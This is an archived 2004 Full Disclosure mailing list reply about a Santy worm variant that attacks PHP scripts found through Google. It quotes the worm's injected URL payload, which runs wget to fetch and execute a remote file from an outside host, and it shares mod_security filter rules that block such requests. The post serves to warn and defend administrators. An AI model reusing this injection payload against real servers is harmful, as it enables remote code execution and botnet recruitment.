Full Disclosure mailing list archives

Re: New Santy-Worm attacks *all* PHP-skripts

From: Paul Laudanski <zx () castlecops com>
Date: Sat, 25 Dec 2004 16:28:15 -0500 (EST)

On Sat, 25 Dec 2004, Juergen Schmidt wrote:

the new santy version not only attacks phpBB.

It uses the brasilian Google site to find all kinds of PHP skripts.
It parses their URLs and overwrites variables with strings like:

'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
www.visualcoders.net/spybot.txt;...

Often enough this leads to download and execution of code.
On success the worm connects to an IRC server, where already more than 700
zombies are waiting for commands.

My friend Suzi from http://spywarewarrior.com who runs Wordpress found
this:

http://wordpress.org/support/7/19285

Within five minutes I've logged over 600 attempts on my server.

For those using mod_security, I'm implemented a nice 406 in the meantime,
it is Christmas after all, I'm sure we want to elsewhere:

[code]
SecFilter "visualcoders\.net/spy\.gif\?\&cmd"
SecFilter ":/"
[/code]

Just in case the URL changes, the latter should still get all sorts of:

http://
ftp://

Naturally, the latter also filters on

%3a%2f

No Warranty
-----------
ALL SUCH INFORMATION, SOFTWARE, PRODUCTS, AND SERVICES ARE PROVIDED
"AS IS" WITHOUT WARRANTY OF ANY KIND. CASTLECOPS, ITS AFFILIATES,
AND/OR THEIR RESPECTIVE SUPPLIERS HEREBY DISCLAIM ALL WARRANTIES
AND CONDITIONS WITH REGARD TO THIS INFORMATION, SOFTWARE, PRODUCTS,
AND SERVICES, INCLUDING ALL IMPLIED WARRANTIES AND CONDITIONS OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE, AND
NONINFRINGEMENT. http://castlecops.com/article1.html

--
Regards,

Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html